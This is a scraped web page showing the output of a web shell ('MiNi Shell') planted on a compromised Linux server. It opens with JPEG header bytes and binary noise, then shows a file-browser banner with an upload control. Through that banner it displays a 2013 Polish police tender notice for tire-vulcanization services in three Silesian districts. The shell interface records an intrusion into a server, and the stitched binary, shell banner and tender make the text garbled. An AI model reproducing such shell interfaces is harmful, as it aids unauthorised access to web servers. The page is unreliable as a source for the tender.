JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130322/43849-N-2013.html

<p class="kh_header"><b>Katowice: Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego</b><br>
<b>Numer ogłoszenia: 43849 - 2013; data zamieszczenia: 22.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego w podziale na 3 n/w zadania:
Zadanie 1 -  Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Jastrzębie Zdrój
Zadanie 2 -  Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Tychy
Zadanie 3 -  Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Zabrze
2. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. 
3. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie jednostek terenowych garnizonu śląskiego: 
Zadanie 1 -  19 szt. samochodów osobowych , 10 szt. samochodów typu furgon w KMP Jastrzębie Zdrój
Zadanie 2 -  44 szt. samochodów osobowych , 8 szt. samochodów typu furgon w KMP Tychy
 Zadanie 3 -  40 szt. samochodów osobowych , 12 szt. samochodów typu furgon w KMP Zabrze 
4. Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. Zamawiający zastrzega, że ilości samochodów w trakcie realizacji umowy mogą ulec zmianie.
5. Zamawiający wymaga, aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiot zamówienia znajdował się w odległości nie przekraczającej 5 km licząc po trasie od siedziby danej jednostki Policji (wg Zumi.pl) (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ) 
UWAGA : Odległość od punktu usługowego do siedziby danej jednostki należy wyliczyć za pomocą programu www.zumi.pl tj. po załadowaniu się strony www.zumi.pl nacisnąć zakładkę (wyznaczanie trasy) następnie nacisnąć zakładkę (własny transport) po czym w pozycji 1 wpisać adres miejsca świadczenia usługi a w pozycji 2 wpisać adres siedziby KMP Jastrzębie Zdrój lub KMP Tychy lub KMP Zabrze w zależności na jakie z 3 zadań została złożona oferta. 
6. W przypadku podania odmiennej liczby kilometrów niż wskazane w programie zumi.pl Zamawiający uzna to za inną omyłkę polegającą na niezgodności z SIWZ i na podstawie art. 87 ust. 2 pkt. 3 ustawy Pzp wpisze właściwą wartość do formularza ofertowego zgodną z ww sposobem obliczenia odległości.
7. Zamawiający dopuszcza podwykonawców.
8. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
9. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA: Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert. Maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie wykonawcy złożone na formularzu ofertowym (zał. nr 1 do SIWZ), że:
posiada punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia, czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę,
ww punkt usługowy znajduje się w odległości nie przekraczającej 5 km licząc po trasie od siedziby jednostki Policji, na którą składa ofertę
2. W przypadku Wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w ofercie w formie oświadczenia, jaki zakres rzeczowy przedmiotu zamówienia będzie realizował każdy z uczestników konsorcjum</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.katowice.kwp.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> KWP Katowice ul. Lompy 19 pokój 735, piętro VII blok C.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2013 godzina 10:00, miejsce: KWP Katowice ul. Lompy 19 pokój 735, piętro VII blok C.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Jastrzębie Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. 
3. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie jednostek terenowych garnizonu śląskiego: 
Zadanie 1 -  19 szt. samochodów osobowych , 10 szt. samochodów typu furgon w KMP Jastrzębie Zdrój
Zadanie 2 -  44 szt. samochodów osobowych , 8 szt. samochodów typu furgon w KMP Tychy
 Zadanie 3 -  40 szt. samochodów osobowych , 12 szt. samochodów typu furgon w KMP Zabrze 
4. Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. Zamawiający zastrzega, że ilości samochodów w trakcie realizacji umowy mogą ulec zmianie.
5. Zamawiający wymaga, aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiot zamówienia znajdował się w odległości nie przekraczającej 5 km licząc po trasie od siedziby danej jednostki Policji (wg Zumi.pl) (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ) 
UWAGA : Odległość od punktu usługowego do siedziby danej jednostki należy wyliczyć za pomocą programu www.zumi.pl tj. po załadowaniu się strony www.zumi.pl nacisnąć zakładkę (wyznaczanie trasy) następnie nacisnąć zakładkę (własny transport) po czym w pozycji 1 wpisać adres miejsca świadczenia usługi a w pozycji 2 wpisać adres siedziby KMP Jastrzębie Zdrój lub KMP Tychy lub KMP Zabrze w zależności na jakie z 3 zadań została złożona oferta. 
6. W przypadku podania odmiennej liczby kilometrów niż wskazane w programie zumi.pl Zamawiający uzna to za inną omyłkę polegającą na niezgodności z SIWZ i na podstawie art. 87 ust. 2 pkt. 3 ustawy Pzp wpisze właściwą wartość do formularza ofertowego zgodną z ww sposobem obliczenia odległości.
7. Zamawiający dopuszcza podwykonawców.
8. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
9. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA: Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert. Maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Tychy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. 
3. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie jednostek terenowych garnizonu śląskiego: 
Zadanie 1 -  19 szt. samochodów osobowych , 10 szt. samochodów typu furgon w KMP Jastrzębie Zdrój
Zadanie 2 -  44 szt. samochodów osobowych , 8 szt. samochodów typu furgon w KMP Tychy
 Zadanie 3 -  40 szt. samochodów osobowych , 12 szt. samochodów typu furgon w KMP Zabrze 
4. Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. Zamawiający zastrzega, że ilości samochodów w trakcie realizacji umowy mogą ulec zmianie.
5. Zamawiający wymaga, aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiot zamówienia znajdował się w odległości nie przekraczającej 5 km licząc po trasie od siedziby danej jednostki Policji (wg Zumi.pl) (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ) 
UWAGA : Odległość od punktu usługowego do siedziby danej jednostki należy wyliczyć za pomocą programu www.zumi.pl tj. po załadowaniu się strony www.zumi.pl nacisnąć zakładkę (wyznaczanie trasy) następnie nacisnąć zakładkę (własny transport) po czym w pozycji 1 wpisać adres miejsca świadczenia usługi a w pozycji 2 wpisać adres siedziby KMP Jastrzębie Zdrój lub KMP Tychy lub KMP Zabrze w zależności na jakie z 3 zadań została złożona oferta. 
6. W przypadku podania odmiennej liczby kilometrów niż wskazane w programie zumi.pl Zamawiający uzna to za inną omyłkę polegającą na niezgodności z SIWZ i na podstawie art. 87 ust. 2 pkt. 3 ustawy Pzp wpisze właściwą wartość do formularza ofertowego zgodną z ww sposobem obliczenia odległości.
7. Zamawiający dopuszcza podwykonawców.
8. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
9. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA: Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert. Maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Zabrze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. 
3. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie jednostek terenowych garnizonu śląskiego: 
Zadanie 1 -  19 szt. samochodów osobowych , 10 szt. samochodów typu furgon w KMP Jastrzębie Zdrój
Zadanie 2 -  44 szt. samochodów osobowych , 8 szt. samochodów typu furgon w KMP Tychy
 Zadanie 3 -  40 szt. samochodów osobowych , 12 szt. samochodów typu furgon w KMP Zabrze 
4. Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. Zamawiający zastrzega, że ilości samochodów w trakcie realizacji umowy mogą ulec zmianie.
5. Zamawiający wymaga, aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiot zamówienia znajdował się w odległości nie przekraczającej 5 km licząc po trasie od siedziby danej jednostki Policji (wg Zumi.pl) (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ) 
UWAGA : Odległość od punktu usługowego do siedziby danej jednostki należy wyliczyć za pomocą programu www.zumi.pl tj. po załadowaniu się strony www.zumi.pl nacisnąć zakładkę (wyznaczanie trasy) następnie nacisnąć zakładkę (własny transport) po czym w pozycji 1 wpisać adres miejsca świadczenia usługi a w pozycji 2 wpisać adres siedziby KMP Jastrzębie Zdrój lub KMP Tychy lub KMP Zabrze w zależności na jakie z 3 zadań została złożona oferta. 
6. W przypadku podania odmiennej liczby kilometrów niż wskazane w programie zumi.pl Zamawiający uzna to za inną omyłkę polegającą na niezgodności z SIWZ i na podstawie art. 87 ust. 2 pkt. 3 ustawy Pzp wpisze właściwą wartość do formularza ofertowego zgodną z ww sposobem obliczenia odległości.
7. Zamawiający dopuszcza podwykonawców.
8. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
9. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA: Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert. Maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com